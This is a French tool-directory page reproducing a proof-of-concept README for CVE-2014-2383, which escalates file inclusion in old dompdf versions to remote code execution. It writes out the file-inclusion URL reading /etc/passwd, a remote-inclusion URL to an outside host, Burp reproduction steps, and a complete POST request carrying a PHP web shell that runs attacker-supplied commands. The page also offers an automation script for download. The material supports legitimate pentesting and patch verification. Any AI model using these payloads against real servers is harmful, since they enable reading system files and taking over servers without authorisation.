Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2014-2383-LFI-to-RCE-Escalation — Exploit de preuve de concept pour CVE-2014-2383 démontrant l'escalade LFI/RFI vers RCE dans dompdf <0.6.1, avec guide de reproduction étape par étape et script d'automatisation. | Kitploit
Outils/GitHubGitHub/relativ3pa1n/cve-2014-2383-lfi-to-rce-escalation
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationDéveloppement de Charges Utiles
GitHubrelativ3pa1n/cve-2014-2383-lfi-to-rce-escalation

CVE-2014-2383-LFI-to-RCE-Escalation

Exploit de preuve de concept pour CVE-2014-2383 démontrant l'escalade LFI/RFI vers RCE dans dompdf <0.6.1, avec guide de reproduction étape par étape et script d'automatisation.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
1il y a 3 ansPas encore vérifié

CVE-2014-2383 Escalade LFI/RFI vers RCE

Environnement de test : dompdf 0.6.0 - php 7.3.33 - apache 2.4.25

Lors d'une évaluation de sécurité, la présence de CVE-2014-2383 a été découverte. Ce document est une preuve de concept et n'inclut pas les détails de la découverte initiale afin de protéger la confidentialité du client. Le contenu de ce document imite cependant l'environnement dans lequel cette vulnérabilité a été exploitée.

Découverte https://github.com/projectdiscovery/nuclei

Détails de CVE-2014-2383

root@kitploit:~
A vulnerability in dompdf.php in dompdf before 0.6.1, when DOMPDF_ENABLE_PHP is enabled, allows context-dependent attackers to bypass chroot protections and read arbitrary files via a PHP protocol and wrappers in the input_file parameter, as demonstrated by a php://filter/read=convert.base64-encode/resource in the input_file parameter.

Observez le wrapper PHP php://filter/resource utilisé pour inclure le fichier /etc/passwd de la cible.

root@kitploit:~
{{BaseURL}}/dompdf.php?input_file=php://filter/resource=/etc/passwd

Non seulement ce wrapper PHP permettait des inclusions de fichiers locaux, mais aussi des fichiers distants.

root@kitploit:~
{{BaseURL}}/dompdf.php?input_file=php://filter/resource=http://relativ3pa1n.com

Escalade vers RCE

Jusqu'à présent, nous avons utilisé des informations connues et des preuves de concept pour exploiter ces vulnérabilités. Dans le but de pousser l'exploitation de cette vulnérabilité, j'ai utilisé d'autres protocoles et filtres PHP afin d'obtenir une sorte de "prétraitement" avant la création du PDF.

Une distinction clé dans cette vulnérabilité LFI/RFI était que tout fichier référencé dans le LFI était rendu sous forme de document PDF. Cela signifierait que tenter de rendre un fichier PHP via le LFI ne ferait que convertir ce fichier en PDF sans exécuter le PHP qu'il contient. En regardant de plus près notre payload, nous observons que le php://filter/resource= est la partie de notre payload qui contourne une restriction mise en place par DOMPDF.

En utilisant un autre filtre PHP, nous pouvons faire en sorte que le serveur prétraite une requête POST avant d'exécuter le LFI. Nous pouvons utiliser le flux d'entrée php://input pour lire les données brutes de notre requête POST. De plus, nous pouvons ajouter un paramètre avec la commande que nous voulons exécuter et le définir dans nos données POST. Ainsi, notre nouveau paramètre ressemblerait à ceci php://input&cmd=id et nos données POST ressembleraient à <?php echo shell_exec($_GET[‘cmd’]);?> . Le résultat est ci-dessous.

Étapes de reproduction

Naviguez vers le LFI une fois que vous avez découvert une version de DOMPDF < 0.6.1

root@kitploit:~
{{BaseURL}}/dompdf.php?input_file=php://filter/resource=/etc/passwd

Capturez cette requête dans un proxy comme BurpSuite

Envoyez la requête à Repeater (ctrl+r)

Une fois la requête dans Repeater, faites un clic droit sur la requête et sélectionnez "Change Request Method"

modifiez le paramètre input_file :

root@kitploit:~
From:
php://filter/resource=/etc/passwd
To:
php://input&cmd=whoami

Ajoutez ceci au corps de la requête POST : (Parfois, les guillemets simples doivent être retapés)

root@kitploit:~
<?php echo shell_exec($_GET['cmd']);?>

La requête entière devrait ressembler à ceci :

root@kitploit:~
POST /dompdf/dompdf.php?input_file=php://input&cmd=whoami HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=3369f6e27b5a514fb12c7bac74f8b11e
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Content-Type: application/x-www-form-urlencoded
Content-Length: 42

<?php echo shell_exec($_GET['cmd']);?>

Si vous utilisez BurpSuite, envoyez la requête puis utilisez la barre de recherche pour rechercher "BT". Observez que la commande a été exécutée et que la réponse est écrite dans les données au niveau octet du PDF en cours de génération. (Dans ce cas, l'utilisateur est "daemon")

J'ai assemblé un script Python qui peut automatiser la plupart de ce processus.

Avertissement : Ceci est à des fins éducatives uniquement. Veuillez laisser les serveurs web des autres tranquilles. 😄

Voici le lien vers la vidéo non listée du RCE. Video

Télécharger l’outil